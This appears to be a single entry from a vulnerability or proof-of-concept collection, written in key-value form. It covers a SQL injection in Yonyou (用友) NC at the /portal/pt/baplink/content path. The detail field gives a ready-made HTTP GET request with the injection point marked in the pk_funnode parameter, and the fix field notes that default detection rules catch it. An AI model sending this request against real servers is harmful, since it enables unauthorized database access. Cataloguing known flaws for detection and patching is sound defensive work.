vendor = "用友"
name = "用友NC baplink SQL注入"
type = "SQL注入"
version = "未知"
path = "/portal/pt/baplink/content"
detail = "GET /portal/pt/baplink/content?pageId=login&pk_funnode=-1* HTTP/1.1 Host: Accept-Encoding: identity User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 Accept: text/html, image/gif, image/jpeg, ; q=.2, /; q=.2"
fix = "缺省规则可检出"
date = "0730"
label = "nday"
verifier = "AdySec"
